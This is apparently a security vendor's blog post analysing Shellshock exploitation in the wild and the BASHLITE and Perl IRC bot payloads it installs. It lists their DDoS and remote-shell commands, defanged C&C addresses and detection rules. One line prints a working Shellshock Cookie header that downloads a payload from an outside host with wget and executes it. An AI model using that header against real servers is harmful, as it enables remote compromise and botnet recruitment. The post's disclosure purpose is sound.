Bash Vulnerability (Shellshock) Exploit Emerges in the Wild, Leads to BASHLITE Malware

Just several hours after the news on the bash vulnerability (covered under CVE-2014-7169) broke out, it was reportedly being exploited in the wild already.  This vulnerability can allow execution of arbitrary code, thus compromising the security of systems. Some of the possible scenarios that attackers can do range from changing the contents of web server and website code to defacing the website to even stealing user data from databases, among others.

We spotted samples which are the payload of the actual exploit code. Detected as ELF_BASHLITE.A (also known as ELF_FLOODER.W), this malware is capable of launching distributed denial-of-service (DDoS) attacks. Some of the related commands it executes are

• PING
• GETLOCALIP
• SCANNER
• HOLD pause or delay attack for specified duration
• JUNK Junk Flooding
• UDP DDoS using UDP packet
• TCP DDoS using TCP packet
• KILLATTK – terminate attack thread
• LOLNOGTFO – terminate bot

It also has the capability to do brute force login, enabling attackers to possibly get the list of login usernames and passwords. Based on our analysis, ELF_BASHLITE.A also connects to a C&C server, 89[dot]238[dot]150[dot]154[colon]5.

Figure 1. Threat infection diagram (Click image to enlarge)

Below is the screenshot of the code depicting the arrival of malware on a system:

Cookie:().{.:;.};.wget.-O./tmp/besh.http://162[dot]253[dot]66[dot]76/nginx;.chmod.777./tmp/besh;./tmp/besh;

As discussed in our earlier post, the severity of this vulnerability is serious given that web servers are mostly affected. It (vulnerability) also poses risks to Internet of Everything/Internet of Things devices that have Linux (and Bash) on them.  It was also reported that it affects Bitcoin/Bitcoin mining, thus attackers may possibly/potentially create armies of bots through this.

The related hash for this attack is 0229e6fa359bce01954651df2cdbddcdf3e24776.

Trend Micro Solutions for Shellshock:

The Trend Micro Smart Protection Network protects users from the BASHLITE variant mentioned above. We will continuously monitor for any other exploits abusing this vulnerability. On the other hand, attempts to exploit the Shellshock vulnerability on the network can be detected via the following Deep Discovery rule:

• 1618 – Shellshock HTTP REQUEST

Other Trend Micro products (Trend Micro OSCE, IWSVA and Titanium) detect this as CVE-2014-6271-SHELLSHOCK_REQUEST.

In addition, Trend Micro Deep Security protects users from this Bash vulnerability through the following DPI rule:

• 1006256 – GNU Bash Remote Code Execution Vulnerability

Other users who may want to check if they are affected should check our free protection for Shellshock. We’ve also released browser extension and device scanners to protect users’ browsers and devices against the risks posed by Bash bug vulnerability. These tools can scan devices to detect if has been affected by the bug.

The Latest Developments on Shellshock: 

We have monitored the developments around this topic and documented them here:

• Information on what the Shellshock vulnerability is, the risks it poses, and what can be done about it
• Possible attack scenarios using Shellshock exploits
• Further investigations about the botnet built using Shellshock
• The basics of the Shellshock vulnerability, and our infographic on it

We are currently doing further research analysis on this topic and will update our blog for developments.  Users can also read more on this in our Simply Security blog.

With additional analysis from Rhena Inocencio, Karla Agregado, Serafin Lago, Alvin Bacani, Kim Sotalbo, Joie Salvio, and Erwina Dungca. 

Update as of 1:38 PM, September 26, 2014

We spotted two malware payloads of the exploit code, one of which is detected by Trend Micro asPERL_SHELLBOT.WZ. When executed, it connects to the IRC server, fbi[dot]bot[dot]nu[colon]5190, where it receives several commands from an attacker. Some of the commands it issues include:

• cback – Execute a remote shell (/bin/sh or cmd.exe)
• download – Download from a URL and save to a specified file
• portscan – Scans an IP address for the following ports
• join – Join a channel
• part – Leave a channel
• rejoin – Leave and rejoin a channel

Another payload is detected as ELF_BASHLET.A, which connects to 27[DOT]19[DOT]159[DOT]224[COLON]4545, where it waits for commands from a malicious attacker.